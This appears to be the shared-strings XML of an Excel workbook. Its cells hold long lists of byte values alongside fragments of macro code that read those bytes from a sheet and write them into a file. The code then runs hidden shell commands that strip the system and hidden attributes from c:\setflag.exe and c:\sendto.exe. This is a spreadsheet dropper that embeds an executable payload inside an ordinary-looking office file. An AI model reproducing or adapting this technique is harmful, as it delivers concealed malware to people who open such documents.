    <t xml:space="preserve">126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92 154 222 161 185 235 52 46 212 13 236 213 220 117 133 188 50 108 2 36 201 197 237 6 89 130 220 220 80 33 93 207 223 183 13 164 84 217 103 70 9 82 203 242 185 165 127 194 80 94 4 187 218 81 197 71 151 239 92 160 149 184 229 187 81 165 18 213 82 188 108 15 24 141 209 186 189 208 130 79 254 60 131 72 202 82 247 86 100 154 89 210 170 193 140 221 99 134 207 45 211 19 137 186 102 82 122 117 42 108 183 67 237 48 38 45 219 45 95 128 156 58 11 240 170 58 92 49 129 75 34 45 223 191 69 185 87 114 49 18 169 128 218 134 165 242 179 102 242 226 179 52 112 77 59 219 110 237 81 98 243 177 72 157 3 70 123 171 254 10 14 101 59 36 56 67 132 159 207 66 132 226 231 183 98 16 48 236 111 38 244 180 14 254 226 167 31 143 68 250 176 64 50 133 250 218 73 216 3 196 45 3 25 194 28 183 169 243 6 126 31 18 156 194 135 51 20 25 78 50 217 204 25 98 165 9 223 144 188 162 211 34 126 150 243 93 147 248 232 24 127 100 204 215 255 137 89 124 79 220 61 86 127 140 134 149 94 35 116 140 73 207 24 138 0 51 161 250 154 80 62 44 154 210 129 238 9 229 81 238 169 254 235 116 224 225 146 45 66 185 201 254 254 78 35 242 0 101 233 180 189 44 157 225 138 129 15 231 175 91 91 102 163 38 34 116 234 83 169 204 64 143 158 158 219 254 106 209 120 50 151 3 189 206 205 87 178 249 254 33 189 24 160 117 136 55 94 69 29 29 0 37 33 80 27 13 45 50 98 123 58 45 144 40 13 81 198 8 162 95 27 3 200 136 95 244 171 244 58 94 125 120 167 49 240 240 22 96 216 248 11 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 123 229 195 146 233 122 12 18 227 0 38 0 124 41 45 64 11 165 180 189 148 225 182 245 150 77 161 121 213 218 83 110 30 239 239 129 120 203 252 80 135 153 226 166 190 142 136 136 239 159 82 160 219 228 153 19 41 169 232 213 162 228 44 101 1 1 178 72 235 134 72 137 6 85 69 67 58 182 58 93 4 239 228 60 17 38 213 53 44 204 18 54 165 143 169 32 60 221 192 243 143 219 14 175 219 243 68 146 106 64 125 98 65 221 86 124 208 54 27 139 77 175 83 32 225 214 161 44 234 169 0 22 133 148 147 42 250 228 36 187 25 146 212 107 58 44 252 129 30 236 76 3 130 244 120 113 161 22 45 182 132 218 10 97 78 248 173 244 56 201 225 91 25 149 107 240 192 129 104 54 169 167 73 150 218 108 185 245 17 153 108 122 49 147 108 121 58 212 63 148 32 30 37 128 57 71 165 178 105 151 43 164 226 140 10 183 108 153 78 88 109 184 23 212 52 132 183 39 34 200 78 35 47 103 136 105 88 85 72 195 195 164 160 90 123 63 22 9 75 16 217 152 238 1 142 74 92 55 30 47 116 228 147 150 63 173 25 180 72 197 51 248 11 195 112 46 96 171 149 192 166 233 152 202 191 167 158 250 132 47 143 170 2 119 77 177 192 54 1 49 205 54 114 74 134 36 92 19 125 216 147 120 198 126 94 168 102 90 102 138 107 104 209 62 175 60 58 111 60 245 125 46 149 143 100 216 171 199 160 32 248 123 8 185 54 241 172 253 12 130 101 222 2 150 8 96 202 191 217 207 112 85 0 212 50 141 255 30 3 162 22 228 1 164 242 239 88 239 222 88 189 52 82 70 224 63 1 248 169 114 30 218 71 157 233 62 7 133 108 134 </t>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t xml:space="preserve">71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 186 143 181 39 126 112 97 181 50 42 2 192 134 235 180 152 146 3 244 231 10 208 158 254 113 122 45 63 254 240 147 112 240 55 219 71 205 93 168 12 208 15 73 13 28 144 142 156 184 19 49 38 181 231 209 163 167 132 234 203 243 54 245 20 9 224 199 205 92 30 218 218 148 95 158 155 170 60 20 127 46 8 172 244 12 217 161 163 167 230 206 28 55 67 53 46 85 7 94 67 195 22 129 40 28 224 221 52 223 17 165 144 42 193 121 221 205 0 65 50 119 237 35 231 248 154 216 126 133 150 76 87 132 221 244 55 28 225 218 222 178 36 154 31 135 35 156 218 177 96 188 63 212 145 74 245 64 14 151 74 142 162 248 222 169 79 147 237 19 81 192 39 185 189 167 72 121 48 14 48 77 90 27 59 182 201 223 163 17 227 55 8 182 144 253 38 201 254 36 121 25 144 26 52 130 18 82 132 178 105 99 104 36 20 21 185 97 227 7 210 90 3 102 45 26 131 245 17 167 118 31 147 218 12 194 10 110 150 125 14 110 121 110 58 180 101 39 135 148 155 162 223 53 144 35 48 210 74 90 83 60 147 35 144 134 247 13 136 67 170 189 159 203 149 138 4 55 218 147 170 75 240 96 248 98 231 146 133 115 105 31 100 107 120 237 114 34 23 152 94 27 163 117 111 59 97 129 25 56 69 90 5 105 113 167 118 215 217 7 133 85 22 246 219 1 186 14 37 132 58 188 178 128 225 109 214 75 76 28 90 248 248 226 15 191 45 172 204 224 215 50 170 176 66 120 146 86 19 73 23 171 44 192 204 163 62 137 40 4 200 253 230 19 191 107 17 157 140 237 92 119 24 246 211 16 8 165 98 36 240 112 125 24 119 224 163 82 87 46 </t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 112 210 124 237 11 69 148 240 198 11 184 198 189 171 10 123 143 142 247 119 133 129 244 244 172 45 228 140 201 173 52 33 179 226 59 167 254 0 215 143 155 17 35 154 2 15 152 112 219 73 237 237 229 176 5 152 49 59 195 90 97 100 43 11 90 57 228 204 248 235 233 193 57 252 245 236 93 89 154 202 24 217 228 136 72 255 58 3 64 247 99 70 164 243 58 190 145 5 167 119 94 63 78 197 52 221 12 126 190 154 114 83 201 140 156 60 255 142 106 3 234 246 11 242 204 100 0 46 113 153 180 151 72 86 71 90 102 143 56 104 52 209 9 51 202 21 88 147 28 67 127 212 104 28 208 20 237 27 128 34 172 230 7 172 157 215 137 132 245 43 165 240 77 172 229 149 207 254 78 147 212 108 186 164 38 153 180 135 52 210 168 96 128 102 51 226 5 182 105 208 186 241 67 69 238 255 125 162 120 94 179 117 196 231 1 175 246 60 224 107 89 255 205 175 3 252 242 135 84 110 169 206 123 146 7 14 238 46 94 166 88 75 49 203 20 115 233 158 192 53 133 241 4 62 87 140 158 192 136 154 217 138 2 216 20 97 118 174 45 188 241 118 202 127 50 229 94 205 28 199 215 82 25 103 137 179 124 66 151 62 133 216 213 24 216 101 64 106 217 69 49 86 251 110 91 56 231 40 107 41 97 153 18 46 221 141 61 187 177 103 247 205 158 121 83 174 122 123 163 164 120 59 163 217 226 81 126 232 110 24 239 132 149 81 63 109 144 232 126 214 40 82 145 111 170 174 91 157 250 204 255 192 102 103 240 227 67 226 199 187 210 110 121 78 181 169 144 187 235 219 246 57 228 213 53 205 35 95 142 130 56 18 173 234 86 185 28 111 128 137 </t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 196 196 12 58 201 35 171 50 13 18 180 228 204 128 2 200 66 177 6 200 4 95 67 195 70 139 155 213 160 17 56 230 175 76 108 47 76 44 63 228 136 244 13 239 34 226 184 25 31 171 213 19 56 90 26 197 228 24 143 61 27 120 67 143 237 156 119 164 63 228 27 116 93 52 161 168 88 45 179 201 112 171 12 184 84 139 146 26 242 171 212 160 235 50 10 107 135 145 200 116 31 229 166 141 252 202 193 49 249 137 76 43 8 227 116 168 92 13 5 140 98 255 230 121 3 57 17 246 129 98 118 110 49 155 121 243 12 10 115 200 251 234 252 4 124 143 184 6 25 97 197 162 69 28 104 73 123 141 80 7 151 133 143 90 216 123 249 168 149 205 226 163 185 108 10 31 117 112 175 11 220 176 146 57 232 26 198 113 163 73 233 48 17 36 141 66 245 240 47 169 41 136 14 77 81 243 142 191 69 78 243 209 167 150 128 48 254 14 251 109 96 148 231 116 94 71 213 22 187 28 66 35 10 192 141 32 244 12 186 162 164 157 101 16 65 109 176 178 80 224 162 202 2 0 1 145 156 157 5 33 8 203 108 178 253 56 59 245 210 10 13 30 101 117 196 49 170 105 66 77 111 226 83 73 247 32 155 46 166 61 15 99 26 253 96 94 121 6 204 27 217 140 7 29 108 74 39 62 114 194 124 140 24 70 222 182 176 9 169 163 7 173 44 67 50 25 37 229 160 133 77 34 113 139 188 29 173 211 206 240 239 171 246 243 92 250 45 155 30 197 89 101 69 128 242 170 92 84 114 93 116 171 220 176 202 93 35 207 126 237 184 129 135 237 163 236 116 111 76 199 194 221 233 213 108 7 181 71 65 183 252 211 27 184 149 6 47 125 72 84 122 168 </t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 124 242 183 177 246 56 147 71 254 171 15 1 55 124 50 152 137 204 4 108 51 151 137 97 83 197 41 161 178 92 218 170 61 109 146 203 67 179 111 66 195 76 70 9 72 7 200 63 128 16 85 60 66 190 209 126 35 81 233 244 26 156 93 97 214 174 37 185 43 162 225 151 234 248 248 147 198 19 252 176 106 59 2 164 253 103 148 193 208 201 202 162 115 12 192 230 117 93 100 103 253 12 110 69 138 157 138 246 204 42 155 160 252 179 212 166 42 105 82 219 184 194 72 109 95 42 70 169 109 12 58 48 233 237 207 236 157 230 236 58 201 214 246 204 88 173 119 241 137 146 40 204 224 7 105 210 143 104 208 123 2 242 31 235 235 2 192 47 238 26 97 191 53 122 132 244 52 29 67 210 213 160 48 3 53 80 91 34 219 181 200 192 234 4 106 34 177 37 210 163 135 68 111 165 117 159 161 13 207 17 27 30 81 42 253 241 49 46 130 49 102 107 99 76 191 57 70 39 153 181 156 254 136 228 28 159 136 125 57 17 27 211 99 132 82 100 193 101 138 186 180 30 228 100 135 171 236 75 22 195 241 23 56 96 43 3 104 183 121 14 85 198 94 140 157 60 220 3 119 120 126 46 27 228 195 185 112 161 239 196 11 93 114 201 110 216 173 161 173 154 122 165 59 27 121 9 135 45 92 245 214 214 54 200 234 144 13 2 105 240 234 43 47 11 115 106 97 39 154 191 255 41 146 134 142 79 40 115 23 114 191 82 249 167 189 211 186 78 106 86 20 230 67 78 213 124 232 164 253 136 249 127 32 151 19 234 33 10 116 135 242 201 205 38 175 190 34 45 94 47 84 143 245 255 27 253 178 244 194 243 128 81 200 78 137 239 176 247 247 </t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 173 189 242 202 43 74 90 254 156 40 16 112 118 170 140 15 186 242 63 226 211 69 88 49 198 108 45 240 14 224 231 35 4 204 234 56 103 25 76 140 234 42 127 117 126 15 153 234 47 111 205 236 34 153 99 156 185 47 187 21 187 142 149 144 150 30 56 0 219 137 189 135 151 105 118 6 47 167 177 166 98 22 111 150 195 52 208 203 200 225 233 228 47 205 224 223 105 24 247 5 28 85 128 170 54 217 47 235 72 147 121 217 143 163 32 131 131 49 108 209 13 130 97 147 74 174 203 94 224 197 17 36 110 43 220 129 155 38 76 216 171 158 174 196 203 227 170 234 176 15 4 175 245 186 62 27 232 198 148 21 182 239 50 143 79 170 188 106 62 148 98 62 20 182 247 239 154 3 210 243 27 4 212 121 216 10 78 252 13 126 158 245 138 248 14 127 193 120 245 229 149 43 123 87 170 93 97 238 196 150 141 1 52 6 6 170 168 46 65 108 180 174 209 170 23 106 122 221 1 131 252 118 50 234 179 32 227 75 132 193 82 239 68 177 87 171 36 87 76 209 97 198 190 14 67 62 130 210 225 22 16 27 206 77 182 176 36 97 151 219 197 105 35 71 12 236 29 218 210 91 122 247 37 98 39 61 123 183 66 3 202 236 145 35 9 172 69 43 178 98 17 180 173 252 46 244 34 22 82 14 167 19 38 224 45 165 68 159 21 62 234 12 206 228 163 143 238 202 136 181 117 52 212 111 237 233 33 45 221 205 71 107 130 233 124 116 247 174 169 177 230 142 134 46 89 149 161 88 99 208 212 155 155 143 69 248 2 124 117 4 41 42 240 165 124 63 154 233 14 38 30 212 159 38 181 39 213 177 93 228 81 114 101 221 71 219 112 121 </t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 108 145 5 90 57 167 144 205 192 85 240 191 51 178 105 26 0 148 62 184 134 187 138 74 253 141 155 183 68 52 203 75 118 58 86 53 119 225 99 182 110 139 249 137 86 181 1 10 214 112 55 54 110 214 8 47 161 235 37 236 63 104 164 61 41 70 218 239 224 7 116 18 251 49 208 147 251 129 180 223 165 147 118 147 70 218 185 1 97 134 146 213 249 91 252 103 72 16 155 10 49 138 196 80 242 193 54 109 225 18 54 197 22 22 166 96 251 92 20 16 230 186 99 56 254 231 237 119 159 47 253 102 251 221 87 75 136 189 232 193 82 205 126 247 126 12 195 144 119 25 188 165 244 207 180 223 197 198 255 180 253 46 66 125 179 253 174 94 127 15 4 237 224 89 240 13 224 107 193 111 2 191 1 124 89 233 95 202 126 151 204 132 138 3 126 21 252 27 224 79 148 254 87 216 239 230 150 77 216 239 14 173 185 173 253 110 222 26 178 30 8 188 183 24 226 117 224 247 174 249 35 246 187 8 249 231 217 239 146 54 255 67 246 187 122 219 23 161 255 203 224 175 129 31 3 79 67 182 9 124 6 248 111 149 253 165 236 119 181 249 113 192 223 98 240 143 128 111 40 251 11 217 239 198 211 143 13 217 38 34 86 157 100 87 219 194 189 69 248 121 215 117 254 6 29 124 96 244 55 112 77 176 76 206 7 72 0 184 27 226 209 254 33 198 216 143 129 5 130 227 176 154 48 85 108 210 213 87 160 42 108 130 213 165 0 163 177 96 112 73 226 109 70 140 165 228 53 112 163 121 196 106 198 107 27 177 207 209 172 91 209 6 232 107 22 255 35 69 71 105 131 185 235 58 106 13 13 192 130 255 223 211 55 153 104 224 158 240 115 133 64 2 228 </t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 209 166 77 124 208 66 62 112 193 218 140 71 254 252 67 210 187 56 176 37 246 137 155 46 211 235 90 235 128 90 55 188 237 54 31 172 205 214 62 88 179 169 249 5 247 195 221 193 173 242 249 2 134 141 158 186 203 80 65 83 196 248 212 204 23 181 151 102 70 152 131 48 202 61 62 159 167 78 222 230 32 101 63 218 170 189 9 160 201 221 96 34 150 39 144 207 114 50 158 4 81 36 67 229 44 50 154 24 87 85 9 174 140 62 44 69 113 105 142 202 205 86 185 44 173 28 173 150 80 238 194 134 46 125 28 179 145 56 69 26 177 114 12 225 159 4 151 213 231 211 192 69 87 182 102 4 205 56 64 106 179 170 153 207 19 155 77 161 250 162 253 188 185 235 71 72 248 59 128 60 221 201 135 141 217 99 178 5 168 1 12 79 124 91 112 125 196 151 143 169 74 58 202 228 34 14 88 232 32 57 98 245 197 252 142 143 216 237 30 149 251 72 235 33 96 152 104 23 6 93 14 131 37 69 26 150 47 146 149 17 184 51 32 32 46 26 113 165 209 172 35 191 99 182 185 11 25 70 59 55 251 169 187 180 161 125 181 10 204 80 247 30 194 83 74 254 163 98 249 112 173 64 222 163 9 111 169 91 15 74 244 82 13 231 77 9 26 206 31 9 213 67 4 231 233 19 56 219 206 17 148 161 247 243 236 207 189 208 201 197 175 245 195 254 8 240 241 249 56 218 231 83 146 52 100 188 158 58 43 114 79 56 170 34 93 186 53 119 125 23 95 147 7 46 53 96 176 33 155 193 35 215 125 210 43 149 170 108 90 40 143 98 25 135 120 165 164 123 132 187 10 137 205 92 98 14 158 72 241 136 190 157 152 218 219 108 167 44 109 </t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t xml:space="preserve">59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238 35 159 199 43 223 253 5 57 91 74 106 108 13 206 217 70 112 13 236 87 217 5 42 55 228 213 218 199 45 163 183 10 77 226 198 7 166 22 215 228 160 110 67 44 249 223 253 202 170 199 41 39 91 30 253 138 78 73 218 208 79 247 150 245 211 104 85 178 162 183 255 77 164 65 243 81 39 146 207 102 155 184 196 208 133 167 148 180 78 180 200 70 62 115 90 232 88 8 7 215 147 178 125 62 21 54 14 108 142 220 212 9 41 41 183 210 3 66 182 43 10 8 149 43 203 102 130 25 157 151 48 254 0 177 73 53 144 252 150 203 57 71 197 183 187 13 226 5 145 17 29 180 59 242 174 58 191 97 171 99 242 223 110 76 186 73 55 233 38 221 164 155 116 147 110 210 77 186 73 55 233 38 221 127 185 251 254 118 138 26 175 165 40 147 159 162 102 129 191 23 252 82 240 69 224 31 1 95 11 190 25 124 59 248 189 224 15 128 63 4 254 36 120 25 124 2 212 159 13 126 17 248 82 240 181 224 119 130 191 12 109 238 131 240 167 224 127 14 254 8 248 19 224 63 194 50 240 55 192 167 60 78 81 89 224 179 193 47 4 255 29 240 101 224 55 129 111 0 255 52 248 103 193 191 4 254 231 143 107 248 170 224 10 178 28 84 5 248 32 215 200 214 239 240 91 253 193 96 83 208 74 81 105 41 20 181 161 108 157 199 163 229 96 146 242 148 172 93 29 151 164 138 214 149 59 75 214 222 204 89 191 52 119 81 94 90 202 3 86 174 177 230 177 6 191 149 109 178 214 55 214 179 245 53 13 245 187 253 214 58 127 77 179 86 15 225 150 33 28 254 164 129 191 177 137 123 188 206 218 210 92 179 205 111 221 14 125 55 52 237 170 </t>
  </si>
  <si>
    <t xml:space="preserve">143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5 102 7 215 192 214 179 117 65 127 77 45 204 208 182 39 190 10 127 251 121 209 43 225 111 17 0 120 90 74 205 99 141 77 193 29 48 1 177 223 150 96 253 193 29 245 141 183 206 87 110 254 109 219 243 55 194 12 54 53 238 240 55 178 0 142 176 121 183 133 173 9 62 206 33 96 75 108 126 115 23 33 236 246 134 38 232 174 241 113 107 115 83 125 35 75 170 66 78 173 191 86 235 191 188 126 91 176 169 165 105 59 107 245 214 183 224 82 21 230 228 88 215 235 27 180 172 254 177 96 77 176 13 225 82 112 207 233 217 46 156 142 185 41 41 110 109 80 223 193 239 151 22 46 92 72 45 143 141 178 177 6 160 184 198 39 26 155 118 53 174 160 168 213 126 182 172 166 133 117 194 22 216 233 119 55 53 115 205 36 79 75 251 234 27 107 155 118 81 229 254 150 150 154 199 253 43 155 90 157 20 215 226 15 218 22 45 172 109 104 184 121 222 241 252 172 88 231 160 86 130 199 248 103 16 142 232 241 157 21 14 106 55 248 229 181 55 225 7 240 220 109 253 239 65 59 142 227 108 21 54 237 216 81 211 88 91 86 223 232 119 82 172 1 114 188 254 96 11 236 35 138 234 160 92 112 74 96 53 182 193 36 82 63 54 20 195 30 95 21 244 227 232 12 250 220 147 37 163 168 59 169 194 134 166 22 127 49 52 212 224 167 94 166 86 53 112 45 117 171 234 27 252 43 185 237 219 161 57 138 58 159 224 11 214 179 126 204 163 254 150 180 228 108 128 51 64 101 37 172 135 157 77 178 169 23 18 54 232 219 216 31 235 148 26 37 56 114 193 32 236 192 88 102 32 193 227 103 177 138 27 183 158 31 250 255 95 9 149 141 117 164 243 90 87 </t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t xml:space="preserve">235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 237 77 78 234 239 200 12 22 249 91 216 96 83 27 245 67 146 42 4 18 1 232 80 111 37 120 53 234 72 150 234 193 132 245 108 67 101 227 46 56 13 212 235 177 18 109 234 169 151 72 189 245 126 45 217 142 88 197 225 176 152 210 90 68 52 156 212 91 100 29 220 216 61 245 11 114 202 10 221 20 245 16 98 182 206 85 142 241 21 24 199 37 114 214 214 6 201 218 29 49 148 1 69 208 15 59 204 121 13 246 224 106 172 93 183 93 91 239 139 134 137 89 220 208 20 155 90 234 45 67 89 97 121 77 179 54 93 80 43 28 159 134 217 243 104 179 129 41 156 29 128 240 222 154 3 48 107 92 235 215 186 202 190 122 214 39 221 164 155 116 147 110 210 77 186 73 55 233 254 148 59 116 167 131 250 241 106 199 68 122 227 108 199 215 96 238 219 241 208 130 45 247 237 88 132 127 108 11 40 42 248 88 14 181 42 91 179 72 68 23 254 158 99 34 52 24 226 42 90 190 222 31 218 118 24 254 8 62 9 186 159 116 147 238 207 117 137 176 245 82 245 248 28 136 199 126 207 241 175 227 226 248 175 147 24 61 254 87 113 241 61 113 241 189 113 241 31 196 197 159 141 139 63 23 23 71 67 65 252 105 69 84 6 60 163 203 217 152 192 109 111 77 124 110 230 55 237 109 235 54 237 227 183 107 143 105 70 21 71 33 196 250 7 30 211 190 189 111 133 16 127 100 160 24 194 233 16 102 67 152 14 97 180 70 251 230 36 12 33 54 252 60 132 179 80 76 135 16 127 182 241 190 26 237 127 9 83 16 182 66 48 188 213 65 161 242 97 8 194 221 16 158 128 16 255 35 194 187 248 17 10 132 111 64 24 213 126 228 146 156 199 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 200 30 245 130 158 238 211 241 57 160 247 247 247 122 254 255 209 241 123 79 47 63 173 151 103 77 209 230 34 230 12 9 52 217 66 104 196 191 245 233 182 167 231 234 249 63 61 175 133 125 63 209 194 206 31 15 225 146 81 142 39 67 36 60 8 240 253 251 207 238 183 222 230 28 116 142 107 161 67 15 255 247 159 9 239 212 195 67 0 255 254 75 23 95 154 69 253 235 75 242 75 27 111 223 254 147 125 36 134 63 227 82 113 118 243 89 43 181 229 108 224 236 162 175 195 159 58 243 241 208 117 144 160 159 140 213 156 116 147 110 210 77 186 73 55 233 38 221 164 155 116 255 63 220 255 3 24 156 25 249 28 30 0 128 67 75 236 61 11 116 83 199 149 35 33 176 73 28 91 124 28 12 24 243 16 159 24 97 20 155 143 237 240 9 194 198 4 103 49 22 182 49 180 113 106 132 45 35 61 100 73 145 100 12 27 118 81 119 113 14 212 104 227 238 226 46 77 147 28 218 101 123 186 57 156 214 105 56 45 39 101 79 156 141 115 32 41 73 73 154 156 165 105 178 135 228 108 55 228 71 217 109 210 165 141 131 246 222 59 243 158 222 179 36 219 73 211 108 207 238 27 233 206 247 206 204 157 59 119 62 111 222 155 153 186 47 247 209 28 223 66 207 44 184 61 95 204 235 198 65 11 226 230 206 125 50 151 157 158 252 194 188 51 166 205 47 204 107 242 250 34 234 59 218 54 119 0 223 146 238 242 72 225 174 128 228 11 72 27 234 27 165 206 96 187 199 113 203 45 55 45 80 158 185 190 246 187 95 254 244 189 191 63 172 192 166 255 254 230 225 231 193 252 206 135 143 146 105 251 240 33 50 27 124 109 94 12 87 242 118 213 48 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 131 142 112 36 220 198 68 25 92 2 207 149 130 231 220 57 231 55 119 106 179 169 107 108 174 106 174 43 47 117 108 216 188 217 104 69 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 245 167 175 134 31 175 144 227 190 10 57 112 188 82 126 212 90 41 71 0 182 236 170 144 95 245 86 200 102 48 75 106 236 242 67 96 62 212 86 33 111 159 82 41 183 63 81 33 255 96 131 93 126 181 205 46 215 54 217 229 51 143 216 229 175 65 252 229 7 86 202 147 79 87 200 123 0 255 158 45 118 121 251 78 187 60 167 163 66 222 2 241 76 109 229 242 235 127 99 151 15 62 82 41 63 59 80 46 251 250 203 229 111 255 176 66 254 171 29 118 249 155 219 237 178 251 137 74 249 69 200 227 69 192 157 243 147 74 217 12 230 218 123 43 228 59 255 173 88 190 145 87 41 15 77 44 151 191 51 173 82 126 254 214 74 185 6 112 191 59 169 92 94 51 189 82 222 8 254 229 64 255 87 238 178 203 222 175 219 229 119 165 10 249 73 160 97 101 94 133 124 3 252 176 124 139 216 116 42 231 220 101 78 246 70 25 127 0 190 110 117 178 77 96 22 205 117 178 133 0 7 240 126 72 128 39 1 